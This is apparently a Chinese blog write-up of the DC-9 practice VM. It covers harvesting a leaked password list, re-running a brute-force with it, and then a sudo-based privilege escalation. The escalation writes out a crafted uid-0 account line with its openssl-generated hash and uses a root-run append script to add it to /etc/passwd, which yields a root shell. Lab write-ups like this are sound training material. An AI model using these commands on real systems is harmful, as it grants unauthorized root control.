joeyt
image
janitor
发现有一个可以文件夹
image
打开看看

janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

添加密码至passtxt重新爆破
image
找到一个新用户
image

尝试登录

对所有用户执行sudo -l后发现fredf结果不大一样

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

跳转到该目录

fredf@dc-9:/opt/devstuff/dist/test$ ls -al
total 12796
drwxr-xr-x 2 root root    4096 Dec 29  2019 .
drwxr-xr-x 3 root root    4096 Dec 29  2019 ..
-rw-r--r-- 1 root root  779676 Dec 29  2019 base_library.zip
-rwxr-xr-x 1 root root   26136 Apr  3  2019 _bz2.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  153904 Apr  3  2019 _codecs_cn.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  158032 Apr  3  2019 _codecs_hk.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   31024 Apr  3  2019 _codecs_iso2022.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  272688 Apr  3  2019 _codecs_jp.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  141616 Apr  3  2019 _codecs_kr.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  112944 Apr  3  2019 _codecs_tw.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   34008 Apr  3  2019 _hashlib.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   74688 Jul 11  2019 libbz2.so.1.0
-rwxr-xr-x 1 root root 3031904 Oct 13  2019 libcrypto.so.1.1
-rwxr-xr-x 1 root root  243840 Sep 20  2019 libexpat.so.1
-rwxr-xr-x 1 root root  158400 Jan 28  2019 liblzma.so.5
-rwxr-xr-x 1 root root 5080176 Apr  3  2019 libpython3.7m.so.1.0
-rwxr-xr-x 1 root root  309096 May  6  2018 libreadline.so.7
-rwxr-xr-x 1 root root  593696 Oct 13  2019 libssl.so.1.1
-rwxr-xr-x 1 root root  183528 Aug  6  2019 libtinfo.so.6
-rwxr-xr-x 1 root root  121280 Sep 26  2017 libz.so.1
-rwxr-xr-x 1 root root   37688 Apr  3  2019 _lzma.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   64792 Apr  3  2019 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   14632 Apr  3  2019 _opcode.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   39944 Apr  3  2019 readline.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   19752 Apr  3  2019 resource.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  116568 Apr  3  2019 _ssl.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   29064 Apr  3  2019 termios.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 1212968 Dec 29  2019 test

准备提权

回退到前面目录发现python脚本

fredf@dc-9:/opt/devstuff/dist/test$ cd ..
fredf@dc-9:/opt/devstuff/dist$ ls
test
fredf@dc-9:/opt/devstuff/dist$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Dec 29  2019 .
drwxr-xr-x 5 root root 4096 Dec 29  2019 ..
drwxr-xr-x 2 root root 4096 Dec 29  2019 test
fredf@dc-9:/opt/devstuff/dist$ cd ..
fredf@dc-9:/opt/devstuff$ ls
build  dist  __pycache__  test.py  test.spec
fredf@dc-9:/opt/devstuff$ 

查看一下内容,生成一个密码用root权限执行脚本写入/etc/passwd文件,所以我们现在就需要构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限

fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

回到kali,使用openssl工具创建一个本地的加密用户,命令openssl passwd -1 -salt admin admin
回到靶机
然后回到靶机,跳转到/opt/devstuff/dist/test目录
使用echo命令在/tmp目录下创建一个文件,命令
echo 'admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0::/root:/bin/bash' >> /tmp/test1
然后使用命令
sudo ./test /tmp/test1 /etc/passwd
使用sudo命令执行test文件将/tmp/test1的内容写入到/etc/passwd文件中

我这里试了好几次,不知道什么原因,最后admin2成功了,有师傅懂的欢迎交流

┌──(root㉿kali)-[~]
└─# ssh [email protected]             
[email protected]'s password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb  1 13:28:27 2024 from 192.168.100.251
fredf@dc-9:~$ cd /opt/devstuff/dist/test
fredf@dc-9:/opt/devstuff/dist/test$ ls 
base_library.zip                                 libpython3.7m.so.1.0
_bz2.cpython-37m-x86_64-linux-gnu.so             libreadline.so.7
_codecs_cn.cpython-37m-x86_64-linux-gnu.so       libssl.so.1.1
_codecs_hk.cpython-37m-x86_64-linux-gnu.so       libtinfo.so.6
_codecs_iso2022.cpython-37m-x86_64-linux-gnu.so  libz.so.1
_codecs_jp.cpython-37m-x86_64-linux-gnu.so       _lzma.cpython-37m-x86_64-linux-gnu.so
_codecs_kr.cpython-37m-x86_64-linux-gnu.so       _multibytecodec.cpython-37m-x86_64-linux-gnu.so
_codecs_tw.cpython-37m-x86_64-linux-gnu.so       _opcode.cpython-37m-x86_64-linux-gnu.so
_hashlib.cpython-37m-x86_64-linux-gnu.so         readline.cpython-37m-x86_64-linux-gnu.so
libbz2.so.1.0                                    resource.cpython-37m-x86_64-linux-gnu.so
libcrypto.so.1.1                                 _ssl.cpython-37m-x86_64-linux-gnu.so
libexpat.so.1                                    termios.cpython-37m-x86_64-linux-gnu.so
liblzma.so.5                                     test
fredf@dc-9:/opt/devstuff/dist/test$ echo 'admin2:$1$admin2$Pr1254RlLuWxoieYEI.Sa0:0:0::/root:/bin/bash' >> /tmp/test1
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/test1 /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin2
Password: 
root@dc-9:/opt/devstuff/dist/test# 

image

成功!flag就在root目录下
image

标签:INFO,100.22,20,渗透,DC,192.168,学习,2019,root
From: https://www.cnblogs.com/p1ggy/p/18000884

相关文章

  • Flink CDC引起的Mysql元数据锁
    记一次FlinkCDC引起的Mysql元数据锁事故,总结经验教训。后续在编写FlinkCDC任务时,要处理好异常,避免产生长时间的元数据锁。同时出现生产问题时要及时排查,不能抱有侥幸心理。1、事件经过某天上午,收到系统的告警信息,告警提示:同步Mysql的某张表数据到Elasticsearch异常,提示连不......
  • 浮木云学习日志(6)---代码导出
    随着对浮木云的了解愈加深入,不知不觉已经形成5篇随笔记录了,新进来的小伙伴想跟我一样了解浮木云的话,可直接进入官网浮木云-产品设计开发智能助手进行了解使用,如果不太清楚使用的话,可直接查看我之前的5篇小记,帮助你快速入门。之前刚介绍浮木云的时候,发现这个小众平台具有导出源代......
  • AWR1243+DCA1000的开箱测试
    一、AWR1243+DCA1000实物图二、开箱测试参考文件:[mmwave_sensor_raw_data_capture_using_dca1000_v02](mmwave_sensor_raw_data_c...sing_dca1000_v02.pdfhttps://www.alipan.com/s/KZaKMNTD7sr)1.AWR1243--SOP模式设置这里是使用DCA1000进行采样,选择“011(SOPmode2)......
  • GPU学习笔记
    GPU相比CPU更适合连续的同质的运算。原因:  GPU有更多算术运算单元(ALU)  支持多线程处理分支  wrap独占寄存器  ...单指令多数据(SIMD):每次取一条指令,应用到多个不同数据计算的计算上。单指令多线程(SIMT):会把程序分支分布到不同线程上,线程组执行每执行指令会更新掩码告......
  • tcp 远程服务器,C#编程学习之使用TcpClient / BeginConnect测试远程服务器tcp端口连接
    原文链接:hhttps://blog.csdn.net/weixin_36286567/article/details/119265325有时候经常需要对一些服务器的端口进行tcp连接测试,通常使用“telnetIP地址端口号”的方式即可,不能说这种方式不可取,只是使用起来比较麻烦,本着简单好用的目的,不如我们自己动手写一个测试tcp端口连接的......
  • 字符串算法学习笔记
    \(\text{Pt.}1\)基础一、进制哈希二、Manacher三、Trie\(\text{Pt.}2\)自动机自动机是什么?它是一个对“信息序列”进行判定的数学模型。“信息序列”可以很随意,比如一个二进制数,比如一个字符串。而“判定”也可以很随意,比如判定一个二进制数是不是奇数,判定当前字符串是......
  • 【渗透工具】一款自动化分析网络安全应急响应工具--FindAll
    简介这款工具的推出将极大地提升蓝队应对网络安全事件的能力,不仅有助于提高响应效率,还能够降低工作复杂性。通过提供全面的信息搜集和高效的威胁分析,我们可以帮助蓝队成员在复杂的网络环境中保持优势,但应急响应是一个十分复杂的工作此工具只能帮助蓝队人员收集部分信息,如有异常发......
  • m基于Q-Learning强化学习的异构网络小区范围扩展(CRE)技术matlab仿真
    1.算法仿真效果matlab2022a仿真结果如下: 2.算法涉及理论知识概要        基于Q-Learning强化学习的异构网络小区范围扩展(CellRangeExtension,CRE)技术是一种旨在优化异构无线网络性能的方法。异构网络是由不同类型的基站(如宏基站、微基站、皮基站等)组成的网络,这......
  • 蒻苟的第一篇学习笔记(快速排序)
    快速排序是一个非常经典也非常常用的排序算法。在平均状况下,排序n个项目需要Ο(nlogn)次比较,在最坏状况下则需要Ο(n2)次比较,但这种状况其实并不常见。快速排序是分而治之思想在排序算法上的典型应用。算法步骤:1.从数列中挑出一个元素,称为"基准"。2。设置两个"哨兵",利用......
  • 欧拉函数学习笔记
    前言本人能力有限,有错误欢迎指出。定义\(\varphi(n)\)表示的是小于等于\(n\)和\(n\)互质的数的个数。公式设\(n=\prod\limits_{i=1}^{s}p_i^{k_i}\),有\[\begin{aligned}\varphi(n)&=\prod_{i=1}^s\varphi(p_i^{k_i})\\&=\prod_{i=1}^sp_i^{k_i}-p_i^{k_i-1}\\&=\prod......